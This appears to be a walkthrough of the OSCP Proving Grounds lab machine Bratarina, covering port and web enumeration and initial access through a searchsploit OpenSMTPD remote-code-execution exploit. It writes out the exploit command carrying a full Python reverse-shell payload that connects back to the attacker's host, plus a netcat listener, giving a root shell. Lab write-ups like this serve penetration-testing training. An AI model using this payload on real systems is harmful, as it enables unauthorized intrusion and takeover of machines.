OSCP Proving Ground Walkthrough: Bratarina

Introduction

Bratarina is an OSCP Proving Grounds Linux Box. Alhtough it is rated as easy, the OSCP Community rates it as intermediate and it is on TJ Null’s list of OSCP like machines. Let’s get started on solving this box.

Service Enumeration

Every penetration test begins with basic enumeration. We can start this box by running a basic port scan on Bratarina using nmap as follows:

> nmap -sC -sV -p- *BRATARINA-IP*

A basic UDP scan can be performed with this command.

> nmap -sU -p- *BRATARINA-IP*

In the line above the flag -sC grabs the banner of the running software while -sV gets the version of the running software. The following TCP ports were open:

22/tcp open ssh
25/tcp open smtp
53/tcp closed domain
80/tcp open http
445/tcp open microsoft-ds

No UDP ports were found via nmap scanning.

Service Enumeration

We can continue this engagement by running basic vulnerability scanning against the services. Enumeration is the crux of any penetration test and proper service enumeration will allow us to gain an initial foothold. We will start by running a Nikto Scan & Nmap Vuln scan against the target to create a list of potential vulnerabilities. They will be done using the following commands below.

Nikto:

> nikto -h *BRATARINA-IP*

Nmap:

> nmap -p- -script=vuln *BRATARINA-IP*

Moreover we can fingerprint the web server running on Bratarina using the following nmap scan:

> nmap -p80 --script=http-enum *BRATARINA-IP*

In parallel we can run a dirbuster scan to enumerate all potential URLs. In this tutorial we will use the basic dirb wordlist by not explicitly specifying a word list as follows:

> dirb http://*BRATARINA-IP*

Unfortunately no interesting URLs or glaring vulnerabilities that resulted in RCEs were picked up by the aforementioned scans. FlaskBB was found to be found running the back end of the webpage on port 80. Verrsion 1.1.5 of flask and below is vulnerable to webshell upload as per this exploit-DB link but I was unable to successfully execute the exploit.

Initial access

Initial access was obtained by circling back to the ports and associated services running on Bratarina. Both exploit-db, searchsploit and google were leveraged to find potential exploits. Searchsploit was able to yield an RCE exploit made in python by running the following commands:

> searchsploit Open SMTP
> searchsploit -m 47984.py

Changing into the directory where the exploit was copied using the second searchsploit command we can run the exploit by using the following command:

 
> python3 47984.py TARGET 25 ‘python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”LOCAL\”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\”/bin/bash\”)”’

In the case above the target IP is the IP of the victem machine and local is the IP of our attacking machine. We must open an nmap listner using the following command:

> nc -nlvp 80

Many other ports are blocked via Bratarina’s firewall and in cases like this, where firewall settings are unknown it is best to use ports that are open on client machines for rev-shell listeners. After running this exploit we get a reverse shell on port 80 with administrative privileges. No need for priv esc or any post exploitation activity. we can simple change into the root directory and see the flag using the cat command.

That is all. Thanks for following my Bratarina walkthrough.